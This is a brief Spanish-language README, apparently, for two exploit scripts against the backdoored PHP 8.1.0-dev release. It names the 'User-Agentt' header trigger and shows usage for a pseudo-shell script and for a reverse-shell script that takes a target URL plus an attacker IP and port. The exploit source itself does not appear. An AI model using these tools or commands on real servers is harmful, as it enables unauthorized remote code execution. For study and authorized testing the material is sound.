
Script de shell del sistema con puerta trasera para PHP 8.1.0-dev
Script de shell del sistema con backdoor para PHP 8.1.0-dev

La versión de PHP 8.1.0-dev se publicó con un backdoor el 28 de marzo de 2021, pero el backdoor fue rápidamente descubierto y eliminado. Si esta versión de PHP se ejecuta en un servidor, un atacante puede ejecutar código arbitrario enviando la cabecera User-Agentt.
El código original se restauró después de descubrirse el problema, pero luego fue manipulado por segunda vez. La brecha habría creado un backdoor en cualquier sitio web que ejecutara la versión comprometida de PHP, permitiendo a los atacantes realizar ejecución remota de código en el sitio.
Leer el artículo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Este breve script de exploit backdoor_php_8.1.0-dev.py utiliza el backdoor para proporcionar una pseudo shell del sistema en el host. Encuéntralo en Exploit DB.
Uso:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Este breve script de exploit revshell_php_8.1.0-dev.py proporciona una shell inversa en el objetivo.
Uso:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

¡Sé curioso, aprender es vida! 😃